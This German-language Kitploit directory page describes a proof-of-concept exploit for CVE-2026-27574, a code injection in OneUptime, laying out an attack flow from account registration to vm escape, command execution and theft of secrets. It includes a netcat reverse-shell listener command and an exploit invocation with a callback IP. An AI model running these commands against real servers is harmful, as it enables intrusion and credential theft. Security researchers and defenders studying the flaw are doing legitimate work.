Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27574-OneUptime-RCE — Proof-of-Concept-Exploit für CVE-2026-27574, eine kritische Code-Injection in OneUptime, die Remote-Code-Ausführung und das Leaken von Umgebungsvariablen ermöglicht. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Proof-of-Concept-Exploit für CVE-2026-27574, eine kritische Code-Injection in OneUptime, die Remote-Code-Ausführung und das Leaken von Umgebungsvariablen ermöglicht.

Repository anzeigen
15vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Überblick

Proof-of-Concept-Exploit für CVE-2026-27574 – eine kritische Code-Injection-Schwachstelle (CWE-94) in OneUptime < 10.0.0, die die Ausführung beliebigen JavaScript-Codes im Probe-Kontext ermöglicht und zu vollständiger sowie zum Abfluss sensibler Umgebungsvariablen führt.

Remote Code Execution (RCE)

Behoben in: OneUptime 10.0.0 (Migration auf isolated-vm)

Exploit-Typ: Remote
Authentifizierung: Geringe Privilegien (jedes registrierte Projektmitglied)
Auswirkung: Vollständige Serverkompromittierung, Diebstahl von Anmeldedaten, Übernahme des Clusters

Angriffsablauf-Diagramm

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Funktionen dieses PoC

  • Automatische Kontoregistrierung
  • Projekterstellung
  • Erstellung bösartiger JavaScript-Monitore
  • Abfluss von Umgebungsvariablen
  • Grundlegender Nachweis der Befehlsausführung
  • Optionaler Reverse-Shell-Payload (auskommentiert)

Verwendung

root@kitploit:~
# Listener starten (falls Reverse Shell verwendet wird)
nc -lvnp 4444

# Exploit ausführen
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

Anforderungen

  • Python 3.6+
  • requests-Bibliothek (pip install requests)

Rechtlicher & ethischer Hinweis

Dieser Code dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests.
Die unbefugte Verwendung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal und unethisch.

Referenzen

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • Patch Commit

Entwickelt von Mohammed Idrees Banyamer • Jordanien • @banyamer_security

Tool herunterladen